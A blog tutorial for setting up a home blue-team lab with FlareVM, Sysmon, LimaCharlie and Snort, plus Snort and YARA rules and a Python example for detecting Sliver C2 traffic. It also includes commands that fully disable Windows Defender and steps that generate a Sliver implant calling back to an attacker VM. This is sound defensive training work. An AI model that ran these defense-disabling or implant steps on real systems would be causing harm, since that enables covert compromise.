Malware Analysis Lab

What is Needed

  • VMWare Workstation
  • Windows 10 VM
  • Ubuntu Server 22

Install Ubuntu

Use the ISO and give the VM at least a 14GB disk, 2 CPUs and 2GB RAM. Disable updates. Now we will make the IP of the VM static. Go on with the installation until the “Network connections” step.

[image: img1]

  1. In VMWorkstation, go to “Edit” > “Virtual Network Editor” > Select the one with type “Type: Nat” > “NAT Settings”. Write down “Gateway IP” and “Subnet IP”, in my case they are 192.168.192.2 and 192.168.192.0 respectively.
  2. In the Ubuntu installation select the first line of the configuration (you’ll probably have something like “eth” something, check img2). Go to “Edit IPv4” > “Manual” > write down the IPs you saw before. Add “/24” at the end of the subnet, give your assigned IP (I put 192.168.192.137) and give a valid DNS server for the “Name servers” field. You can use Google’s one, 8.8.8.8. You can leave the other field empty.

[image: img2]

You can go on with the installation. No need to get fancy, keep the defaults. Install OpenSSH and we are done.

Install Windows

Follow the installation process and keep defaults. After you have everything ready you can move to disable the Windows Defender Antivirus and install other useful tools.

Disable Defenses

If you want to learn what a piece of malicious software does to its full potential, the best way is not trying to stop it in any way. For this reason we want to disable all the defenses that are shipped by default with Windows.

  1. Use the Group Policy Editor to disable Windows Defender: Start > search for “Group Policy” > Local Computer Policy > Administrative Templates > Windows Components > Windows Defender > Turn off Windows Defender > “Enable”
  2. To be sure, permanently disable Defender by adding a registry value:
REG ADD "hklm\software\policies\microsoft\windows defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  3. Again with the Group Policy Editor go to: Computer Configuration > Administrative Templates > Windows Components > Windows Security > Notifications > Hide all notifications > “Enable”
  4. Use safe mode to complete the settings: Start > type “msconfig” > “Boot” tab > Boot Options > check Safe boot > Minimal > Apply and OK > now you can reboot. From the rebooted system: Start > type “regedit” > set the “Start” value (you will find it on the right side) to 4 for each of the following keys. After that go again into the Boot options and uncheck Safe boot.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter

[image: imgRegistry]

Install FlareVM

FlareVM is a suite of tools and configurations created by Mandiant to help analysts with their job. Installing it gives you various tools to better explore the system and all the bad things that will happen in it.

  1. Download the installer from here
  2. Unblock it and enable execution with
Unblock-File .\install.ps1
Set-ExecutionPolicy Unrestricted -Force
  3. Launch it
.\install.ps1

You will be asked to make some choices; you can personalize the installation as you see fit. When in doubt keep the defaults.

[image: imgGUIFlare]

Other Useful Tools

In addition to what is already present in FlareVM we want to install Sysmon. Download it and unzip it:

iwr -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile C:\Windows\Temp\Sysmon.zip
Expand-Archive -LiteralPath C:\Windows\Temp\Sysmon.zip -DestinationPath C:\Windows\Temp\Sysmon

We will use the SwiftOnSecurity Configs:

iwr -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile C:\Windows\Temp\Sysmon\sysmonconfig.xml

Now we can install.

C:\Windows\Temp\Sysmon\Sysmon64.exe -accepteula -i C:\Windows\Temp\Sysmon\sysmonconfig.xml

To check that everything has been installed correctly, verify that the service is installed and that it’s capturing events:

Get-Service sysmon64
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10

After the first command you should see the service running, and after the second you should see the captured events.

Install an EDR

What we want to do with these machines is not only study threats but also be able to catch and limit their actions, as if we were SOC analysts in a real company. For this reason we want to install an EDR (in our case LimaCharlie) and an IDS/IPS (in our case Snort) to explore the use of products and rules used to limit the actions of malware.

LimaCharlie

  1. Register on the website
  2. After having created your account, create an organization and use as template “Extended Detection & Response Standard”
  3. Click on “Add a Sensor”, create a key, and associate the two. You want an x86-64 (.exe) sensor
  4. Follow the instructions in the Windows VM. If you did the previous steps outside the VM, you can obtain the installer directly on the Windows machine with
iwr -Uri https://downloads.limacharlie.io/sensor/windows/64 -Outfile C:\Users\User\Downloads\lc_sensor.exe
  5. Check that the service is registered and finish
  6. From the LimaCharlie GUI, go to: Artifact Collection > Artifact Collection Rules > Add Rule and use:

Name: windows-sysmon-logs
Platforms: Windows
Path Pattern: wel://Microsoft-Windows-Sysmon/Operational:*
Retention Period: 10

  7. Save

Snort

  1. Get Snort and WinPcap. The archive is a .tar.gz, so extract it with the tar bundled in Windows 10 rather than Expand-Archive, which only handles .zip files:
iwr -Uri https://github.com/snort3/snort3/archive/refs/tags/3.1.78.0.tar.gz -Outfile C:\Users\User\Downloads\snort.tar.gz
mkdir C:\Users\User\Downloads\snort
tar -xzf C:\Users\User\Downloads\snort.tar.gz -C C:\Users\User\Downloads\snort
  2. Get the rules
  3. Fix the config: invert the path separators (turn “/” into “\”), put your IP in the right spot, and comment out this line:

decompress_swf { deflate lzma } \

A Windows-adapted snort.conf you can start from: https://raw.githubusercontent.com/thereisnotime/Snort-Default-Windows-Configuration/master/snort.conf

Attacker

Our attacker will be the Ubuntu machine. SSH into it and get root (use your IP and user):

ssh mat@1.1.1.1
sudo su

We will install a C2 framework to play the attacker’s side. We will use Sliver, you can get it with:

wget https://github.com/BishopFox/sliver/releases/download/v1.5.34/sliver-server_linux -O /usr/local/bin/sliver-server
chmod +x /usr/local/bin/sliver-server

We can now start the C2 server and generate the implant (use your user and IP). We will create a folder first:

mkdir /opt/sliver
cd /opt/sliver
sliver-server
generate --http mat@1.1.1.1 --save /opt/sliver

Your implant will have been given a name (mine is called X). Keep in mind that yours will be different. Now we want to move the implant to the victim VM.

You can close the SSH connection and start the Sliver listener.

sliver-server
http

Move to the Windows victim VM and start the infection by running the exe you just copied over.

Return to the Linux attacker and check for the opened session (it might take some time). Write down the ID and connect to it. I’ll use my ID; yours will be different.

use X

Now you are in and the C2 is installed.

Doing some Analysis

In this section I briefly show how the lab can be operated. Examples are very simple and can be used to verify everything is working correctly and that you are familiar with the tools.

Snort

  1. Quick test (replace <N> with the index of your capture interface; snort -W lists them):
snort -i <N> -c C:\Snort\etc\snort.conf -T
  2. Start capture:
snort -i <N> -c C:\Snort\etc\snort.conf -A console
  3. Add the rules to your rules file:
alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Session Message Detected"; flow:to_server,established; content:"POST"; http_method; pcre:"/\/(?:php|api|upload|actions|rest|v1|auth|authenticate|oauth|oauth2|oauth2callback|database|db|namespaces\/)?(login|signin|api|samples|rpc|index|admin|register|sign-up)\.php\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000002; rev:1;)
alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Poll Detected"; flow:to_server,established; content:"GET"; http_method; pcre:"/\/(?:js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript\/)?(bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|script|email)\.js\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000003; rev:1;)
alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Close File Detected"; flow:to_server,established; content:"GET"; http_method; pcre:"/\/(?:static|www|assets|images|icons|image|icon|png\/)?(favicon|sample|example)\.png\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000004; rev:1;)

Thanks to ImmersiveLabsSec for the rules.

  4. Capture with the rules loaded

Now you can run Snort and operate Sliver. You will get hits for the opening and closing of the connection and some other operational network exchanges.
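To see what the three rules above actually key on before loading them into Snort, here is an added example (my own code, not part of the original post and not from ImmersiveLabs or the Snort project) that replays their matching logic in Python over a handful of constructed HTTP requests. It assumes a request can be reduced to method, URI and Cookie header, which is what the http_method, /U and /C parts of the rules inspect; the flow and $HTTP_PORTS conditions are not modelled, and Python's re is used as a stand-in for PCRE, which is fine for these patterns.

```python
import re

# Cookie-name check shared by all three rules (the pcre with the /C modifier).
COOKIE_RE = re.compile(r"(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)")

# URI checks transcribed from the /U pcre of each rule, keyed by sid.
RULES = [
    {
        "sid": 1000002,
        "msg": "Sliver C2 Session Message Detected",
        "method": "POST",
        "uri": re.compile(
            r"/(?:php|api|upload|actions|rest|v1|auth|authenticate|oauth|oauth2|"
            r"oauth2callback|database|db|namespaces/)?"
            r"(login|signin|api|samples|rpc|index|admin|register|sign-up)\.php\?[a-zA-Z]="
        ),
    },
    {
        "sid": 1000003,
        "msg": "Sliver C2 Poll Detected",
        "method": "GET",
        "uri": re.compile(
            r"/(?:js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript/)?"
            r"(bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|"
            r"script|email)\.js\?[a-zA-Z]="
        ),
    },
    {
        "sid": 1000004,
        "msg": "Sliver C2 Close File Detected",
        "method": "GET",
        "uri": re.compile(
            r"/(?:static|www|assets|images|icons|image|icon|png/)?(favicon|sample|example)"
            r"\.png\?[a-zA-Z]="
        ),
    },
]


def matching_sids(method, uri, cookie):
    """Return the sids of the rules that would fire on one client request.

    All three conditions of a rule must hold: the HTTP method (http_method
    content match), the URI pattern (/U pcre) and the cookie pattern (/C pcre).
    """
    hits = []
    for rule in RULES:
        if method != rule["method"]:
            continue
        if not rule["uri"].search(uri):
            continue
        if not COOKIE_RE.search(cookie):
            continue
        hits.append(rule["sid"])
    return hits


# Constructed sample requests (method, URI, Cookie header); not captured traffic.
SAMPLES = [
    ("POST", "/api/login.php?a=1", "PHPSESSID=3f9a"),   # session message shape
    ("GET", "/js/jquery.min.js?q=7", "SID=77"),          # poll shape
    ("GET", "/static/favicon.png?z=3", "APISID=9"),      # close-file shape
    ("GET", "/index.html", "PHPSESSID=3f9a"),            # ordinary page, no rule
    ("POST", "/api/login.php?a=1", ""),                  # URI matches, no cookie
    ("GET", "/js/jquery.min.js?q=7", "theme=dark"),      # URI matches, other cookie
]


def run_samples():
    """Map every sample request to the list of sids it triggers."""
    return {(m, u, c): matching_sids(m, u, c) for m, u, c in SAMPLES}


if __name__ == "__main__":
    for (method, uri, cookie), sids in run_samples().items():
        print(f"{method} {uri!r} cookie={cookie!r} -> {sids}")
```

The last two samples show the trade-off these rules make: the cookie-name check keeps false positives on ordinary web traffic down, but it also means the rules stay silent on requests whose URI fits the pattern while the cookie does not, so treat them as a starting point and pair them with the Sysmon and EDR telemetry set up earlier rather than relying on them alone.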

LimaCharlie & YARA

With LimaCharlie you can check a lot of things. Explore the WebGUI and see if you can find IOCs (try to look among the connections ;)).

One specific thing I wanted to explore with LimaCharlie is the use of YARA rules: go to Automation > YARA Rules > Add Yara Rule. You can name it however you want. We want to identify Sliver, so we will use this rule. Just copy-paste it and save.

Now we want to activate it. Go to Automation > D&R Rules > New Rule. In the Detect block put the following (it matches YARA_DETECTION events that carry a rule name and are not tied to a running process, i.e. hits on files on disk):

event: YARA_DETECTION
op: and
rules:
  - not: true
    op: exists
    path: event/PROCESS/*
  - op: exists
    path: event/RULE_NAME

In the Respond block put:

- action: report
  name: YARA Detection {{ .event.RULE_NAME }}
- action: add tag
  tag: yara_detection
  ttl: 80000

Name it and save it.

To test it, go to Sensors > Sensors List > select your sensor > Console. Insert the command (use your payload name):

yara_scan hive://yara/sliver -f C:\Users\User\Downloads\[payload_name].exe

You should now see that the sliver payload has been identified!

Conclusion

This blog post has been made to give you a fast way to set up a lab for blue team analysis. The examples given are very simple; if you want to explore more I cannot stress enough how good So you want to be a SOC analyst? by ecapuano is. He is way (way way way) more knowledgeable than me; the info you find in this post has been inspired by and checked against the content you’ll find in his series. He also recently updated the course so you might want to check that out too!